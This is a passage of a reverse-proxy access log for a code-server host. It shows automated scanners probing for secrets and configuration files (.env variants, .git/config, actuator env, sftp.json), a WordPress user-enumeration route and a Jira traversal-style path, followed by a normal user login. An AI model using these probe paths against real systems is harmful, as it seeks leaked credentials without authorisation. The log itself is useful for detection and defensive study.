Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:24:23 +0000] - - 502 - GET https code.profibot.hu "/swagger/swagger-ui.html" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:23 +0000] - - 502 - GET http code.profibot.hu "/swagger.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:24 +0000] - - 502 - GET https code.profibot.hu "/webjars/swagger-ui/index.html" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:24 +0000] - - 502 - GET http code.profibot.hu "/swagger/v1/swagger.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:25 +0000] - - 502 - GET https code.profibot.hu "/swagger.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:25 +0000] - - 502 - GET http code.profibot.hu "/v2/api-docs" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:26 +0000] - - 502 - GET https code.profibot.hu "/swagger/v1/swagger.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:26 +0000] - - 502 - GET http code.profibot.hu "/v3/api-docs" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:27 +0000] - - 502 - GET https code.profibot.hu "/v2/api-docs" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:27 +0000] - - 502 - GET http code.profibot.hu "/api-docs/swagger.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:28 +0000] - - 502 - GET https code.profibot.hu "/v3/api-docs" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:28 +0000] - - 502 - GET http code.profibot.hu "/api/swagger.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:29 +0000] - - 502 - GET https code.profibot.hu "/api-docs/swagger.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:29 +0000] - - 502 - GET http code.profibot.hu "/@vite/env" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:30 +0000] - - 502 - GET https code.profibot.hu "/api/swagger.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:30 +0000] - - 502 - GET http code.profibot.hu "/actuator/env" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:31 +0000] - - 502 - GET https code.profibot.hu "/@vite/env" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:31 +0000] - - 502 - GET http code.profibot.hu "/server" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:32 +0000] - - 502 - GET https code.profibot.hu "/actuator/env" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:32 +0000] - - 502 - GET http code.profibot.hu "/.vscode/sftp.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:33 +0000] - - 502 - GET https code.profibot.hu "/server" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:34 +0000] - - 502 - GET https code.profibot.hu "/.vscode/sftp.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:34 +0000] - - 502 - GET http code.profibot.hu "/about" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:35 +0000] - - 502 - GET http code.profibot.hu "/debug/default/view?panel=config" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:36 +0000] - - 502 - GET https code.profibot.hu "/about" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:36 +0000] - - 502 - GET http code.profibot.hu "/v2/_catalog" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:37 +0000] - - 502 - GET https code.profibot.hu "/debug/default/view?panel=config" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:37 +0000] - - 502 - GET http code.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:38 +0000] - - 502 - GET https code.profibot.hu "/v2/_catalog" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:38 +0000] - - 502 - GET http code.profibot.hu "/server-status" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:39 +0000] - - 502 - GET https code.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:39 +0000] - - 502 - GET http code.profibot.hu "/login.action" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:40 +0000] - - 502 - GET https code.profibot.hu "/server-status" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:40 +0000] - - 502 - GET http code.profibot.hu "/_all_dbs" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:41 +0000] - - 502 - GET https code.profibot.hu "/login.action" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:41 +0000] - - 502 - GET http code.profibot.hu "/.DS_Store" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:42 +0000] - - 502 - GET https code.profibot.hu "/_all_dbs" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:42 +0000] - - 502 - GET http code.profibot.hu "/.env" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:43 +0000] - - 502 - GET https code.profibot.hu "/.DS_Store" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:44 +0000] - - 502 - GET https code.profibot.hu "/.env" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:44 +0000] - - 502 - GET http code.profibot.hu "/.git/config" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:45 +0000] - - 502 - GET http code.profibot.hu "/s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:46 +0000] - - 502 - GET https code.profibot.hu "/.git/config" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:46 +0000] - - 502 - GET http code.profibot.hu "/config.json" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:47 +0000] - - 502 - GET https code.profibot.hu "/s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:47 +0000] - - 502 - GET http code.profibot.hu "/telescope/requests" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:48 +0000] - - 502 - GET https code.profibot.hu "/config.json" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:48 +0000] - - 502 - GET http code.profibot.hu "/info.php" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:49 +0000] - - 502 - GET https code.profibot.hu "/telescope/requests" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:49 +0000] - - 502 - GET http code.profibot.hu "/?rest_route=/wp/v2/users/" [Client 146.190.103.103] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:50 +0000] - - 502 - GET https code.profibot.hu "/info.php" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:24:51 +0000] - - 502 - GET https code.profibot.hu "/?rest_route=/wp/v2/users/" [Client 157.245.204.205] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[19/Jan/2026:23:25:07 +0000] - - 502 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:07 +0000] - - 502 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:07 +0000] - - 502 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:07 +0000] - - 502 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:16 +0000] - - 502 - GET https code.profibot.hu "/" [Client 216.194.87.54] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:23:25:16 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 216.194.87.54] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/" +[19/Jan/2026:23:25:16 +0000] - - 502 - GET https code.profibot.hu "/" [Client 104.253.252.75] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:23:25:16 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 104.253.252.75] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://code.profibot.hu/" +[19/Jan/2026:23:25:27 +0000] - - 502 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:27 +0000] - - 502 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:27 +0000] - - 502 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:27 +0000] - - 502 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:25:32 +0000] - - 502 - GET https code.profibot.hu "/" [Client 213.136.82.24] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[19/Jan/2026:23:25:32 +0000] - - 502 - GET http code.profibot.hu "/" [Client 213.136.82.24] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[19/Jan/2026:23:26:14 +0000] - - 502 - HEAD https code.profibot.hu "/" [Client 193.19.82.13] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:23:26:26 +0000] - - 502 - HEAD https code.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:26:26 +0000] - - 502 - HEAD https code.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:26:26 +0000] - - 502 - HEAD https code.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:26:26 +0000] - - 502 - HEAD https code.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to code-server] "Python/3.13 aiohttp/3.11.18" "-" +[19/Jan/2026:23:27:55 +0000] - - 502 - GET https code.profibot.hu "/" [Client 37.76.11.249] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:27:55 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.11.249] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[19/Jan/2026:23:27:56 +0000] - - 502 - GET https code.profibot.hu "/" [Client 66.249.81.132] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:23:27:56 +0000] - - 502 - GET https code.profibot.hu "/" [Client 66.249.81.134] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:23:27:57 +0000] - - 502 - GET https code.profibot.hu "/" [Client 66.102.9.71] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:23:30:28 +0000] - - 502 - GET https code.profibot.hu "/.git/config" [Client 194.163.149.48] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1" "https://mail.google.com/" +[19/Jan/2026:23:30:30 +0000] - - 502 - GET https code.profibot.hu "/" [Client 98.88.137.2] [Length 154] [Gzip -] [Sent-to code-server] "-" "-" +[19/Jan/2026:23:33:33 +0000] - - 502 - GET https code.profibot.hu "/" [Client 128.192.12.114] [Length 154] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; UGAResearchAgent/1.0; Please visit: NISLabUGA.github.io)" "-" +[19/Jan/2026:23:34:21 +0000] - - 502 - GET https code.profibot.hu "/.git/config" [Client 46.105.92.110] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Brave/131" "-" +[19/Jan/2026:23:39:18 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.11.249] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 37.76.11.249] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 37.76.11.249] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 37.76.11.249] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.11.249] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 37.76.11.249] [Length 4219] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 37.76.11.249] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:18 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.11.249] [Length 5265] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:31 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 37.76.11.249] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:31 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.11.249] [Length 56] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:31 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/config/workspace" [Client 37.76.11.249] [Length 1380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[19/Jan/2026:23:39:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.css" [Client 37.76.11.249] [Length 112516] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:32 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js" [Client 37.76.11.249] [Length 187953] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:33 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js" [Client 37.76.11.249] [Length 3502601] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:34 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.11.249] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:34 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.11.249] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:34 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 37.76.11.249] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:34 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 37.76.11.249] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:35 +0000] - 302 302 - GET https code.profibot.hu "/?folder=/config/workspace" [Client 66.249.81.134] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/keybinding/browser/keyboardLayouts/layout.contribution.linux.js" [Client 37.76.11.249] [Length 6730] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js" +[19/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/login?folder=/config/workspace&to=" [Client 66.249.81.133] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.11.249] [Length 402] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[19/Jan/2026:23:39:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/media/code-icon.svg" [Client 37.76.11.249] [Length 261] [Gzip -] [Sent-to code-server] 